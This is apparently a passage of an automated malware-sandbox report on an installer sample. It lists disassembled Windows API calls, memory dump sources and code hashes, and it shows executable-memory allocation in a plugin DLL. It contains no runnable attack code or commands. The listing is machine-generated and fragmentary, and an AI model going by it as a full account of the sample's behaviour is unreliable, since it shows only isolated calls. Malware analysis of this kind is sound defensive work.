                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                              • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                              • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                              APIs
                                                                                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004123B1,0040CED0,004033DE,0040CED0,004123B1,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3934441357-0
                                                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                              • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                              • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(6F97505C,00000004,00000040,6F97504C), ref: 6F9729B1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: cde6fd543cc16d0eb244f05092479c68d0a495c46ae4c9cfed04b452c818d378
                                                                                                              • Instruction ID: 79e1802133870088ee71a3ef427af58cfc8bbf9b108d9697b4de265db1aa70bf
                                                                                                              • Opcode Fuzzy Hash: cde6fd543cc16d0eb244f05092479c68d0a495c46ae4c9cfed04b452c818d378
                                                                                                              • Instruction Fuzzy Hash: 80F0A5F0908BA0DEFBE0CF2C8444B193BE0B74B724B14452AE24CD6281E734B464CF91
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                              • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                              • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 973152223-0
                                                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                              • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                              • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                              • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,6F97123B,?,6F9712DF,00000019,6F9711BE,-000000A0), ref: 6F971225
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocGlobal
                                                                                                              • String ID:
                                                                                                              • API String ID: 3761449716-0
                                                                                                              • Opcode ID: 935e9c6045fd8f8298e5b7316ad210d84aad40df53d168516fea1fd779741c5a
                                                                                                              • Instruction ID: 7c60edbddf64525b1393e228b84151473e50d151813140302ba705d967793ac5
                                                                                                              • Opcode Fuzzy Hash: 935e9c6045fd8f8298e5b7316ad210d84aad40df53d168516fea1fd779741c5a
                                                                                                              • Instruction Fuzzy Hash: 2AB00271B48610DFFF409B6CCD46F3536D4F745715F444050F605D5185D66468248D75
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                              • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                              • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                              • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                              • EmptyClipboard.USER32 ref: 004058B7
                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                              • CloseClipboard.USER32 ref: 00405912
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID: (7B${
                                                                                                              • API String ID: 590372296-525222780
                                                                                                              • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                              • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                              • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                              • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                              • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                              • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$A$Call
                                                                                                              • API String ID: 2624150263-413618503
                                                                                                              • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                              • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                              • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                              • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                              APIs
                                                                                                                • Part of subcall function 6F97121B: GlobalAlloc.KERNELBASE(00000040,?,6F97123B,?,6F9712DF,00000019,6F9711BE,-000000A0), ref: 6F971225
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6F971C6B
                                                                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 6F971CB3
                                                                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 6F971CBD
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F971CD0
                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F971DB2
                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F971DB7
                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F971DBC
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F971FA6
                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 6F972140
                                                                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 6F9721B5
                                                                                                              • LoadLibraryW.KERNEL32(00000008), ref: 6F9721C6
                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 6F972220
                                                                                                              • lstrlenW.KERNEL32(00000808), ref: 6F97223A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 245916457-0
                                                                                                              • Opcode ID: 1dc0ad9673ab8240f1c97561122495be4a4167d2922c352c0885f5cac3d0ddd3
                                                                                                              • Instruction ID: aedc822dc0fa2a54c675ff50d89b279ae063246e167d6d2f3a3c027eebb99590
                                                                                                              • Opcode Fuzzy Hash: 1dc0ad9673ab8240f1c97561122495be4a4167d2922c352c0885f5cac3d0ddd3
                                                                                                              • Instruction Fuzzy Hash: 24227771D18706DBDB348FA889A46EAB7F8FF06315F10462AD1A5A62C0DB70E6C48F50
                                                                                                              APIs
                                                                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateInstance
                                                                                                              • String ID:
                                                                                                              • API String ID: 542301482-0
                                                                                                              • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                              • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                              • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                              • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFindFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 1974802433-0
                                                                                                              • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                              • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                              • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                              • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                              APIs
                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000010,?,00000040,00001018,6F9724AA,00000000,?), ref: 6F9726E9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 43f648b7f625e9aba8de20efc7c3d5cbff67546c1c5830bcab43641d2f463462
                                                                                                              • Instruction ID: 76ad9be5ec9dd2e8f497e3d20b9f98a5af8be88d01751a7969d7fedfbfd04df2
                                                                                                              • Opcode Fuzzy Hash: 43f648b7f625e9aba8de20efc7c3d5cbff67546c1c5830bcab43641d2f463462
                                                                                                              • Instruction Fuzzy Hash: BAF01470548B90CEEB658F3C8515B817BE0FB0A324F054698E1EA9B2D1D3B4B881CF50
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                              • GetSysColor.USER32(?), ref: 004045FE
                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                              • SetCursor.USER32(00000000), ref: 00404720
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
